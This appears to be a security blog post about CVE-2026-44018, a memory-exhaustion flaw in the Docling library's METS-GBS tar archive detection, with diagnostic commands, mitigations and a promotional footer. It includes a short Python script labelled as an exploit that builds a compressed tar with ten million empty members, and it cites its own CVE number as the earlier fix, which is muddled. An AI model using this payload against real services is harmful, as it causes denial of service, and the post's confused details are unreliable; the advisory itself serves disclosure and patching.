Listen to this Post
CVE-2026-44018 is a memory exhaustion vulnerability in Docling, a document processing library that parses diverse formats and integrates with generative AI ecosystems. The flaw resides in the METS-GBS format detection logic within `docling/datamodel/document.py` and the backend implementation in docling/backend/mets_gbs_backend.py. When Docling processes a METS-GBS archive, it calls `tarfile.TarFile.getmembers()` to retrieve the complete list of archive members before enforcing the `max_member_count` limit. This ordering is critical: `getmembers()` allocates a `TarInfo` object for every member declared in the archive, including empty members, and the allocation occurs during the format detection phase—before the `allowed_formats` restriction is applied. An attacker can craft a small gzip-compressed tar archive containing a very large number of empty members. Because the archive is compressed, the file size on disk remains minimal, but the declared member count in the tar header can be arbitrarily high. When Docling attempts to detect the format, it invokes getmembers(), which allocates memory proportional to the declared member count. The `max_member_count` check is performed only after this full enumeration, so the memory exhaustion occurs regardless of the limit. This issue is a residual weakness in the member-count protection originally added for CVE-2026-44018. The vulnerability affects Docling versions from 2.45.0 until 2.131.0, where the fix ensures the member count is validated before full enumeration. The advisory for this specific issue was withdrawn as a duplicate of GHSA-3cr3-8m4c-fpxw, but the underlying flaw remains a valid security concern for unpatched versions.
DailyCVE Form:
Platform: Docling
Version: 2.45.0-2.131.0
Vulnerability : METS-GBS memory exhaustion
Severity: Moderate
date: Oct 6, 2026
Prediction: 2.131.0 released
What Undercode Say:
Analytics:
Check installed Docling version
pip show docling | grep Version
Inspect vulnerable code path for getmembers()
grep -rn "getmembers" docling/backend/mets_gbs_backend.py
grep -rn "getmembers" docling/datamodel/document.py
Search for max_member_count enforcement
grep -rn "max_member_count" docling/
Count members in a tar archive without extracting
tar -tf suspicious.tar | wc -l
Examine tar header for declared member count
python3 -c "import tarfile; t=tarfile.open('suspicious.tar'); print(len(t.getmembers()))"
Vulnerable pattern in Docling
def detect_mets_gbs_format(path):
tar = tarfile.open(path)
members = tar.getmembers() Allocates all TarInfo objects
if len(members) > MAX_MEMBER_COUNT:
raise ValueError("Too many members")
... further processing
Exploit: (Educational Purposes!)
A malicious actor can generate a gzip-compressed tar archive with a minimal compressed size but a header declaring millions of empty members. When Docling processes this file, `getmembers()` allocates a `TarInfo` object for each declared member, consuming memory proportional to the member count. For example, a 1 KB gzip file can declare 10 million members, causing the process to exhaust available memory and crash. The exploit is triggered during format detection, so it occurs before any format restrictions are applied.
import tarfile
import io
Create a tar with many empty members
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode='w:gz') as tar:
for i in range(10_000_000):
info = tarfile.TarInfo(name=f"empty_{i}")
info.size = 0
tar.addfile(info)
buf.seek(0)
Save as a small gzip file
with open('malicious.tar.gz', 'wb') as f:
f.write(buf.read())
Protection: from this CVE
Update Docling to version 2.131.0 or later, where the member count is validated before full enumeration. As a temporary mitigation, avoid processing untrusted METS-GBS archives and enforce strict input validation at the application layer. If patching is not possible, wrap calls to Docling in a memory-limited sandbox or pre-scan tar headers to reject archives with excessive declared member counts.
Impact:
Successful exploitation leads to memory exhaustion, causing a denial of service (DoS) condition. The Docling process becomes unresponsive or crashes, potentially affecting any application or service that relies on Docling for document processing. The attack requires only a small crafted file, making it easy to deliver and difficult to detect until memory resources are depleted.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

